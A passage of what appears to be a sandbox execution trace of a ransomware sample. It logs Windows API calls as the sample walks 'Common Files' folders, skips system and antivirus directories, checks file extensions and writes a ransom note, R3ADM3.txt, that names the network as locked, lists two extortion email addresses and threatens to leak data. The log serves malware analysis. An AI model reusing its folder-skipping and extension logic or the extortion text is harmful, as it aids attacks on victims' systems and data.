hHeap=0xea0000) returned 1 [0151.324] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.324] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf20f20 | out: hHeap=0xea0000) returned 1 [0151.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20f20 [0151.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeed88 [0151.324] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.324] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Triedit", cAlternateFileName="")) returned 1 [0151.324] lstrcmpW (lpString1="Triedit", lpString2=".") returned 1 [0151.324] lstrcmpW (lpString1="Triedit", lpString2="..") returned 1 [0151.324] StrStrIW (lpFirst="Triedit", lpSrch="tmp") returned 0x0 [0151.325] StrStrIW (lpFirst="Triedit", lpSrch="winnt") returned 0x0 [0151.325] StrStrIW (lpFirst="Triedit", lpSrch="temp") returned 0x0 [0151.325] StrStrIW (lpFirst="Triedit", lpSrch="thumb") returned 0x0 [0151.325] StrStrIW (lpFirst="Triedit", lpSrch="$Recycle.Bin") returned 0x0 [0151.325] StrStrIW (lpFirst="Triedit", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.325] StrStrIW (lpFirst="Triedit", lpSrch="System Volume Information") returned 0x0 [0151.325] StrStrIW (lpFirst="Triedit", lpSrch="Boot") returned 0x0 [0151.325] StrStrIW (lpFirst="Triedit", lpSrch="Windows") returned 0x0 [0151.325] StrStrIW (lpFirst="Triedit", lpSrch="Trend Micro") returned 0x0 [0151.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.325] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.325] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20f48 [0151.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeed10 [0151.325] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.325] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VBA", cAlternateFileName="")) returned 1 [0151.325] lstrcmpW (lpString1="VBA", lpString2=".") returned 1 [0151.325] lstrcmpW (lpString1="VBA", lpString2="..") returned 1 [0151.325] StrStrIW (lpFirst="VBA", lpSrch="tmp") returned 0x0 [0151.325] StrStrIW (lpFirst="VBA", lpSrch="winnt") returned 0x0 [0151.325] StrStrIW (lpFirst="VBA", lpSrch="temp") returned 0x0 [0151.325] StrStrIW (lpFirst="VBA", lpSrch="thumb") returned 0x0 [0151.325] StrStrIW (lpFirst="VBA", lpSrch="$Recycle.Bin") returned 0x0 [0151.326] StrStrIW (lpFirst="VBA", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.326] StrStrIW (lpFirst="VBA", lpSrch="System Volume Information") returned 0x0 [0151.326] StrStrIW (lpFirst="VBA", lpSrch="Boot") returned 0x0 [0151.326] StrStrIW (lpFirst="VBA", lpSrch="Windows") returned 0x0 [0151.326] StrStrIW (lpFirst="VBA", lpSrch="Trend Micro") returned 0x0 [0151.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.326] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.326] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20f70 [0151.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee860 [0151.326] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.326] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2c6940, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xd250e300, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd250e300, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VC", cAlternateFileName="")) returned 1 [0151.326] lstrcmpW (lpString1="VC", lpString2=".") returned 1 [0151.326] lstrcmpW (lpString1="VC", lpString2="..") returned 1 [0151.326] StrStrIW (lpFirst="VC", lpSrch="tmp") returned 0x0 [0151.326] StrStrIW (lpFirst="VC", lpSrch="winnt") returned 0x0 [0151.326] StrStrIW (lpFirst="VC", lpSrch="temp") returned 0x0 [0151.326] StrStrIW (lpFirst="VC", lpSrch="thumb") returned 0x0 [0151.326] StrStrIW (lpFirst="VC", lpSrch="$Recycle.Bin") returned 0x0 [0151.326] StrStrIW (lpFirst="VC", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.326] StrStrIW (lpFirst="VC", lpSrch="System Volume Information") returned 0x0 [0151.326] StrStrIW (lpFirst="VC", lpSrch="Boot") returned 0x0 [0151.326] StrStrIW (lpFirst="VC", lpSrch="Windows") returned 0x0 [0151.327] StrStrIW (lpFirst="VC", lpSrch="Trend Micro") returned 0x0 [0151.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.327] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.327] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20f98 [0151.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee950 [0151.327] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.327] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VGX", cAlternateFileName="")) returned 1 [0151.327] lstrcmpW (lpString1="VGX", lpString2=".") returned 1 [0151.327] lstrcmpW (lpString1="VGX", lpString2="..") returned 1 [0151.327] StrStrIW (lpFirst="VGX", lpSrch="tmp") returned 0x0 [0151.327] StrStrIW (lpFirst="VGX", lpSrch="winnt") returned 0x0 [0151.327] StrStrIW (lpFirst="VGX", lpSrch="temp") returned 0x0 [0151.327] StrStrIW (lpFirst="VGX", lpSrch="thumb") returned 0x0 [0151.327] StrStrIW (lpFirst="VGX", lpSrch="$Recycle.Bin") returned 0x0 [0151.327] StrStrIW (lpFirst="VGX", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.327] StrStrIW (lpFirst="VGX", lpSrch="System Volume Information") returned 0x0 [0151.327] StrStrIW (lpFirst="VGX", lpSrch="Boot") returned 0x0 [0151.327] StrStrIW (lpFirst="VGX", lpSrch="Windows") returned 0x0 [0151.327] StrStrIW (lpFirst="VGX", lpSrch="Trend Micro") returned 0x0 [0151.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20fc0 [0151.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec98 [0151.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.328] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Visio Shared", cAlternateFileName="VISIOS~1")) returned 1 [0151.328] lstrcmpW (lpString1="Visio Shared", lpString2=".") returned 1 [0151.328] lstrcmpW (lpString1="Visio Shared", lpString2="..") returned 1 [0151.328] StrStrIW (lpFirst="Visio Shared", lpSrch="tmp") returned 0x0 [0151.328] StrStrIW (lpFirst="Visio Shared", lpSrch="winnt") returned 0x0 [0151.328] StrStrIW (lpFirst="Visio Shared", lpSrch="temp") returned 0x0 [0151.328] StrStrIW (lpFirst="Visio Shared", lpSrch="thumb") returned 0x0 [0151.328] StrStrIW (lpFirst="Visio Shared", lpSrch="$Recycle.Bin") returned 0x0 [0151.328] StrStrIW (lpFirst="Visio Shared", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.328] StrStrIW (lpFirst="Visio Shared", lpSrch="System Volume Information") returned 0x0 [0151.328] StrStrIW (lpFirst="Visio Shared", lpSrch="Boot") returned 0x0 [0151.328] StrStrIW (lpFirst="Visio Shared", lpSrch="Windows") returned 0x0 [0151.328] StrStrIW (lpFirst="Visio Shared", lpSrch="Trend Micro") returned 0x0 [0151.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20fe8 [0151.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf20fe8 | out: hHeap=0xea0000) returned 1 [0151.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20fe8 [0151.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedce60 [0151.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.329] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VSTO", cAlternateFileName="")) returned 1 [0151.329] lstrcmpW (lpString1="VSTO", lpString2=".") returned 1 [0151.329] lstrcmpW (lpString1="VSTO", lpString2="..") returned 1 [0151.329] StrStrIW (lpFirst="VSTO", lpSrch="tmp") returned 0x0 [0151.329] StrStrIW (lpFirst="VSTO", lpSrch="winnt") returned 0x0 [0151.329] StrStrIW (lpFirst="VSTO", lpSrch="temp") returned 0x0 [0151.329] StrStrIW (lpFirst="VSTO", lpSrch="thumb") returned 0x0 [0151.329] StrStrIW (lpFirst="VSTO", lpSrch="$Recycle.Bin") returned 0x0 [0151.329] StrStrIW (lpFirst="VSTO", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.329] StrStrIW (lpFirst="VSTO", lpSrch="System Volume Information") returned 0x0 [0151.329] StrStrIW (lpFirst="VSTO", lpSrch="Boot") returned 0x0 [0151.329] StrStrIW (lpFirst="VSTO", lpSrch="Windows") returned 0x0 [0151.329] StrStrIW (lpFirst="VSTO", lpSrch="Trend Micro") returned 0x0 [0151.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21010 [0151.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee6f8 [0151.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.330] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Folders", cAlternateFileName="WEBFOL~1")) returned 1 [0151.330] lstrcmpW (lpString1="Web Folders", lpString2=".") returned 1 [0151.330] lstrcmpW (lpString1="Web Folders", lpString2="..") returned 1 [0151.330] StrStrIW (lpFirst="Web Folders", lpSrch="tmp") returned 0x0 [0151.330] StrStrIW (lpFirst="Web Folders", lpSrch="winnt") returned 0x0 [0151.330] StrStrIW (lpFirst="Web Folders", lpSrch="temp") returned 0x0 [0151.330] StrStrIW (lpFirst="Web Folders", lpSrch="thumb") returned 0x0 [0151.330] StrStrIW (lpFirst="Web Folders", lpSrch="$Recycle.Bin") returned 0x0 [0151.330] StrStrIW (lpFirst="Web Folders", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.330] StrStrIW (lpFirst="Web Folders", lpSrch="System Volume Information") returned 0x0 [0151.330] StrStrIW (lpFirst="Web Folders", lpSrch="Boot") returned 0x0 [0151.330] StrStrIW (lpFirst="Web Folders", lpSrch="Windows") returned 0x0 [0151.330] StrStrIW (lpFirst="Web Folders", lpSrch="Trend Micro") returned 0x0 [0151.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21038 [0151.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf21038 | out: hHeap=0xea0000) returned 1 [0151.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21038 [0151.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcee8 [0151.331] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.331] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 1 [0151.331] lstrcmpW (lpString1="Web Server Extensions", lpString2=".") returned 1 [0151.331] lstrcmpW (lpString1="Web Server Extensions", lpString2="..") returned 1 [0151.331] StrStrIW (lpFirst="Web Server Extensions", lpSrch="tmp") returned 0x0 [0151.331] StrStrIW (lpFirst="Web Server Extensions", lpSrch="winnt") returned 0x0 [0151.331] StrStrIW (lpFirst="Web Server Extensions", lpSrch="temp") returned 0x0 [0151.331] StrStrIW (lpFirst="Web Server Extensions", lpSrch="thumb") returned 0x0 [0151.331] StrStrIW (lpFirst="Web Server Extensions", lpSrch="$Recycle.Bin") returned 0x0 [0151.331] StrStrIW (lpFirst="Web Server Extensions", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.331] StrStrIW (lpFirst="Web Server Extensions", lpSrch="System Volume Information") returned 0x0 [0151.331] StrStrIW (lpFirst="Web Server Extensions", lpSrch="Boot") returned 0x0 [0151.331] StrStrIW (lpFirst="Web Server Extensions", lpSrch="Windows") returned 0x0 [0151.331] StrStrIW (lpFirst="Web Server Extensions", lpSrch="Trend Micro") returned 0x0 [0151.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0151.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0151.331] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.331] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.331] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0151.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21060 [0151.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeedb60 [0151.332] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.332] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 0 [0151.332] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8ec8 | out: hHeap=0xea0000) returned 1 [0151.332] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecbd0 | out: hHeap=0xea0000) returned 1 [0151.332] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0151.332] Sleep (dwMilliseconds=0x32) [0151.414] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeef2b0 | out: hHeap=0xea0000) returned 1 [0151.414] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec698 | out: hHeap=0xea0000) returned 1 [0151.414] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3658 [0151.414] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c08 [0151.414] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec698 [0151.414] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c08 | out: hHeap=0xea0000) returned 1 [0151.414] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c08 [0151.414] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecbd0 [0151.414] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec36b0 [0151.414] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec35a8 [0151.414] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0151.415] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec35a8 | out: hHeap=0xea0000) returned 1 [0151.415] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec36b0 | out: hHeap=0xea0000) returned 1 [0151.415] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecbd0 | out: hHeap=0xea0000) returned 1 [0151.415] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services\\R3ADM3.txt" (normalized: "c:\\program files\\common files\\services\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0154.063] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0154.063] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0154.064] CloseHandle (hObject=0x6dc) returned 1 [0154.064] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0154.064] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c08 | out: hHeap=0xea0000) returned 1 [0154.064] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Services\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x60c88a70, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x60c88a70, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0154.065] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0154.065] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x60c88a70, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x60c88a70, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.065] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0154.065] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0154.065] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60c88a70, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x60c88a70, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x60c88a70, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0154.065] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0154.065] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0154.065] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0154.065] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0154.066] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0154.066] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0154.066] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0154.066] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0154.066] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0154.066] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafbfd139, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0xafbfd139, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0xafbfd139, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="verisign.bmp", cAlternateFileName="")) returned 1 [0154.066] lstrcmpW (lpString1="verisign.bmp", lpString2=".") returned 1 [0154.066] lstrcmpW (lpString1="verisign.bmp", lpString2="..") returned 1 [0154.066] StrStrIW 